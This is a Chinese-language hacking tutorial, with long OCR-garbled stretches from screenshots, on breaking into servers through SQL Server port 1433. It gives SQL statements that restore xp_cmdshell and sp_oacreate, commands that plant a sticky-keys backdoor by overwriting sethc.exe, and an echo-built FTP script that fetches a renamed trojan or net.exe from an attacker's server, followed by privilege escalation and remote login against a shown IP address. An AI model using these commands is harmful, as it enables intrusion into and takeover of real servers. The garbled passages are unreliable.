利用SQL之1433端口巧妙入侵服务器

1、利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433都提示用net netl提权都说拒绝访问！且又无法上传！今天给大家针对Net没权限情况的提权方法；1、未找到储存过程！那就来修复下吧！用到SQL语句：xp_cmdshell 新的恢复办法第一步先删除：drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复：dbcc addextendedproc ("sp_oacreate",&q

2、uot;odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复，不管sp_addextendedproc 是不是存在图12、修复好了 ！又出现问题了 ！xplog70.dll被删除了 ！看来只有用授鱼的那修复法图5简体中文企业光盘版3、应用软件 SQLServer2000MicrosoftSQLServer2000SP4 SP4M86binnxplog70.dLL找到了哈哈！4、恢复！用到SQL语句：第一exec sp_dropextendedproc '

3、xp_cmdshell'第二应用软件SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版 SP4x86binnxplog70.dLL")恢复好了连接号SLTOOLS. Qe. f 9tnwIe5日语敬置IF地址e.Cl.180. IBS.205 瑜口乒石 尸名国 密吗数据库 限碧&远程路径Y：瓯用软件法0百世后而而Ml诉上传上修设置本地文件I打开SHELLS邮母台然L曲令文件齿理发堂自定义£KEU命令 di C *"""也行奇若一 11 3 3 m a B B m I 一* h 11 一

4、， 3 3 ：- KT_CMDSHEU. DA2HEL JGBSHELL ： DIY SHELL SESHELL c : %wi nnt 寸二七 em 藜 tiaUi a 三无时更悻 |<J:%T3tm.ResmeDLL_EDlO£70 dllm±_£&役todsolerc dllULL_路鞋 laDEtsi. dll.Resume ALL2 503-Q6-J3 2 009-06-11：2 009-OT-J1 2&09-06-?fi2 009-07-01£ (JO 0-06-2：S 2009-06-502 009- 0&-2

5、2(jnq-06-iS。争0*02导小&杀oq& _u I-1 一 oj 1- n- 1L- 1 i± JI Jx 14QWfl AVTQEKEC. IAT53546 223bsmaiiL= runt ime.legd2病<DIK>0COMFIG. SYSDocuments andSettintE54llCl. -txt04<DIK>ProEram Files43<D：B>KavEixi47<mii>RELYCIE250T3tmp. I cig15<bii>TDDowiload2S<DIR>mwB

6、owsB3比IBlODPUb6 -54国322字专T个目录1，TEL 5整，32。可押字方都的序列号是?0Q7-01DD哇哈哈！ 吃的好饱的! 修复成功！Ekec COS Command5、提下权net netl 都拒绝访问！管理降低了权限- W 3:r -i i-j ： = c -1 I ：- - f.'i b v '- L IIF地址 |60.18C.1&5,205一端口 1W 尸名标一密码数据库 lister' 造上传设置本地文件|打开远程路径1个应用软件"刈1qrmrEQQ。麻不上传5HELL丁0士备杳弱L的学宝作旨埋安装自冠叉SHELL曲杳

7、ntt user c&cnima e&orim /idd» '的行曲卷(* XP.CMDSKELL i OASKEL f J OB SHELLIITSHELL SESHELL k ；、一由八亚 G MuSW'i* 式 is | 临时又徉 c Ttmp. 1qE发生菜绽播设5.柜里诗解.修复好了该提权了吧！郁闷！拒绝访问！ net netl都拒绝！无奈！只能看不能干！DOS Cwnmiwd Exec Dane!Verl. 06、于是我想到了后门提权！居然管理也注意到了后门！写了权限！用到CMD命令：五shift键（前提是能执行DOS命令，并且sethc.

8、exe没加保护）一般只要执行第一步!copy C:WINDOWSexplorer.exe c:windowssystem32sethc.execopy C:WINDOWSexplorer.exe c:windowssystem32dllcachesethc.exe7、插入一点：如果DOS不能执行命令的话！那就用SQL执行替换命令！（成功率比较低！）用到SQL语句：利用SQL分析器开shift后门（一般只要执行第一步！然后进入后，替换自己的后门）第一：declare o intexec sp_oacreate 'scripting.filesystemobject', o out

9、exec sp_oamethod o, copyfile',null,'C:WINDOWSexplorer.exe' ,'c:windowssystem32sethc.exe'declare ®q int&EeC sp_oa.creqte J scripting.filesyFsteiiat?jert? j 电口 oit&xec wPrCanethod 口, J copyf ile：，； mllj 1C： WINIX)VSexplorer, c:declare oo intexec sp_oacreate 'script

10、ing.filesystemobject', oo outexec sp_oamethod oo,'copyfile',null,'c:windowssystem32sethc.exe' ,'c:windowssystem32dllcachesethc.exe'图7直诲 一 CO. 1CU- 205, of4ster. 一无标题DOS命令不能改后门！ ,那SQL应该可以！没想到！出现这!M)BC;消息必嫉别叵状态IodsoleTO, dll 中找到函数 spoa-creat eo 原因：127(找不到指定的程序口匕 服哥器:消息10019

11、-级别值状意1，行。忠栗%核命专中|£处理晟场蚯调用3P_QACieate(>匚网格圆消息报查诲巴完成,但有错误g60, 180. 155. 2tE Ca.D) /)mast&r D：OO.C1 口行 行3,列9T8、这里是本节的重点了!利用传马的方式提权！首先自己架设一个FTP或是自己已经有FTP的！把本机的net放到FTP空间里去！随便改个名字！切记不要和net相同即可!把FTP传马方式的语句一句一句复制 执行DOS命令！ 用到CMD命令:echo open FTP> xiuxiu.txt注意xiuxiu.txt你可以随意改！但是要和下的相同echo 帐号 &

12、gt;> xxxx.txtecho 密码 >> xxxx.txtecho binary >> xxxx.txtecho get net 的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /fSQLTMLT2 0 ww. 3?safe c：:，rr,汉化hy t工三IP地址 60. 180. 165.205尸名雷码数据库master上传设叠本地文件打开流程路在d-、应用谢牛 XSQLSemrE 皿口 Micrcf上传SHELL'DOS命令京建自定

13、义SHELL的令«eho ccwL ai cp. n«t> xiuxini. txt句一句的执行下面的语句!' KP_CTO SHELL OASHL : JOE SHELL DIYSHELLSESHELLc:imt sy s t em 3 2 i a s i a s三11机行曲时交伴 cATStp.'iotResumeDLL_前役 zplotTO. dll自己架设个DLL,fidsflliTO. dllDLL.ft EDsttr. dllResuffie ALLFTP空间！然后把本机的注意:up.XL -记事率het放进去echo echo cho e

14、cho echo echo ftpop«n .eicp.n&t> xiuxiu.txt黑这是本节的重点!binary >> xiuxiu.txtget xiuxiu,ee>> xiuxiu-txt馈蓝%利用传马方式提权!随便改个名字！ exitdel xiuxiu.txt. /q /F我想大家都看的懂!我的马不免杀了！所以!DOS Commajid Exec Done!9、好了 ！执行下最后一条命令！嘿嘿!发现和FTP抓鸡方式一样！有鸡来下载！执行命令后！押二，:fU 士一发现耳匕里就像抓鸡二箱聋函漱福口儿LLH/C7/ZO09 01,19:19

15、,765 226 Transfer oompl&te01 /C7/3009 01:19:18 109 150 Optning BIHARY mode data ccinectioirL for file traitsfer. iJtiEfSSilHfv»pI-® M*i： ? 一二- .« ,.fc ,- I. , . -. 3 1* «»" I. -L> _. -" « .«_ n p” .»|1 -d . ." 一 .- - 3 . -j. 1.L" ,一二

16、LI1/07/2COQ 01 19：L7,S&g 20C Pert domnand success£tJ.ai/C7/2J009 0117,859 FO1T 60,1BO7 165f 205f EU1/O7/2C09 01,19:17.56 226 Tsfer iarpleti.11/07/009 01 13:16, CS3 150 Opening BINARY mode data eonnection foi Eil电 transfer.1/C7/2O09 01 19:L6,C93 他TE 格iLxiu. exe01 /C7/2O09 01； 19也5.906 204 Fo

17、rt 人所仞d success01/C7/2O0Q 01:19:15 ?06 POUT 60180"珥 205,4,501/07/2009 01:19：L5,S2e 200 Te set t口 I01/07/2009 01 曲 15.S28 THE I1/OT/ZG09 01-19:15,750 EDO Type set t* I帆/57加度I 01:19:15,750 TYTE 1 一Oi/CT/£009 01： 19; 15, CM 盆0 ClieMfcsafaiy 上。蠲式 in Cliat IP 力。，用Q. 1 用.M5 1/07/2009 01 19:15.C0

18、901/07A2009 01-19:15,515 331 %至近5rd Eq1/OTAZG09 01:19:15 515 ITSIKU1/CT/ZC09 ar 19； EZO ”式扁t* to LZL' £ FTF Serr V3 9 1Ul/CT/ECOS QI- 19:14,3 Clisnt iiscoiuitcted front 60 IW 165. 2C510、好了！最后一条命令执行成功了 ！返回以下数据！注意:服务器必须能上网！图1011、我XXxX我自己的net好象没加权限吧！居然不能执行返回了以下数据！发生系统错误5这很多人都遇见过！其实可以省掉一部分！以后提权传net的时候不要传net直接netl因为所以！我也解释不清楚！图1312、嘿嘿netl后成功了！提权成功！图1213、远程登录成功图13il.3ru. fl 耳管理应用醛序I围悭I隹觉I收叫旧户-1|XpntKfl